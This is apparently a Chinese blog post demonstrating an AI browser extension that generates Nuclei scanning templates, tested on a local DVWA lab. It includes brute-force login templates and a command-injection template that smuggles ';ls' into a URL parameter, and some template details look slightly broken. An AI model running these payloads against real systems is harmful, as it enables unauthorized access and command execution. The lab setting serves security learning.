正文

哪有什么黑客,我一直都是保安讷!

admin
admin V管理员 /0 评论 /288 阅读
0122
此篇文章发布距今已超过651天,您需要注意文章的内容或图片是否可用!

nuclei-ai-extension

功能简介

  • 用于生成模板的上下文菜单选项
  • HackerOne 报告到 nuclei 模板生成
  • ExploitDB 对 Nuclei 模板生成的漏洞利用
  • BugCrowd / Intigriti / Synack 支持(即将推出)

安装

  • https://github.com/projectdiscovery/nuclei-ai-extension/releases 下载压缩包
  • 解压后存在一个目录,为需要导入到浏览器的扩展
  • 打开浏览器扩展页面
  • 启用页面内的开发者模式
  • 导入解压的文件夹
  • 安装完成

使用

  • 要使用上下文菜单从任何网站上的选定文本生成细胞核模板:
  • 从任何网站、博客或推文中选择漏洞信息。
  • 右键单击以打开上下文菜单,然后选择“Generate Nuclei Template”选项。
  • 如果需要,请进行任何更改以改进或更新提示。
  • 单击“生成”按钮。
  • AI 将根据所选文本生成一个 Nuclei 模板。

测试

  • 测试一:DVWA 登陆界面测试生成 pass fuzz 模板

id: login-pass-fuzz-brute
info:
  name: Login Password Fuzz Brute
  author: pdteam
  severity: info
  reference: http://127.0.0.1:4280/login.php

http:
  - method: POST
    path:
      - "{{BaseURL}}/login.php"
    payloads:
      username:
        - admin
      password:
        - fuzz.txt
    attack: clusterbomb 
    body: "username=§username§&password=§password§"
    matchers:
      - type: word
        words:
          - "Welcome Admin"
  • 测试二:DVWA 第一关 Vulnerability: Brute Force  ,模板如下

id: http-get-fuzzing-example
info:
  name: HTTP GET Fuzzing Example
  author: pdteam
  severity: info
  reference: http://127.0.0.1:4280/vulnerabilities/brute/?username=admin&password=pass&Login=Login#

http:
  - method: GET
    path:
      - "{{BaseURL}}?username=admin&password={{fuzz}}&Login=Login#"
    payloads:
      fuzz:
        - admin
        - pass
        - password
    matchers:
      - type: word
        words:
          - "Welcome Admin"
  • 测试三:DVWA 第二关 Vulnerability: Command Injection  模板如下

id: command-injection-ls
info:
  name: Command Injection ;ls
  author: pdteam
  severity: high
  reference: http://127.0.0.1:4280/vulnerabilities/exec/#

http:
  - method: GET
    path:
      - "{{BaseURL}}/?ip=;ls"
    matchers:
      - type: word
        words:
          - "bin"
          - "boot"
          - "dev"
          - "etc"
          - "home"
          - "lib"
          - "opt"
          - "root"
          - "sbin"
          - "srv"
          - "tmp"
          - "usr"
          - "var"
        part: body

总结

Over   ..  .. . .  . . . .. .

☺️


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com